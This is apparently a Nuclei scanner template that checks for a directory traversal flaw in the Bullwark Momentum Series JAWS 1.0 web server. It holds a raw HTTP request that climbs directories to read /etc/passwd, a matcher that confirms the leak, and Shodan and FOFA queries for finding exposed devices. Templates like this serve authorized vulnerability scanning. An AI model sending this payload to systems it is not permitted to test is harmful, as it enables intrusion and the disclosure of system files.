id: bullwark-momentum-lfi

info:
  name: Bullwark Momentum Series JAWS 1.0 - Directory Traversal
  author: pikpikcu
  severity: high
  reference:
    - https://www.exploit-db.com/exploits/47773
    - http://www.bullwark.net/ # vendor homepage
    - http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 # software link
  metadata:
    version: Bullwark Momentum Series Web Server JAWS/1.0
    shodan-query: https://www.shodan.io/search?query=Bullwark&page=1
    fofa-query: https://fofa.so/result?q=Bullwark&qbase64=QnVsbHdhcms%3D
  tags: bullwark,lfi

requests:
  - raw:
      - |
        GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Referer: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - "root:.*:0:0"
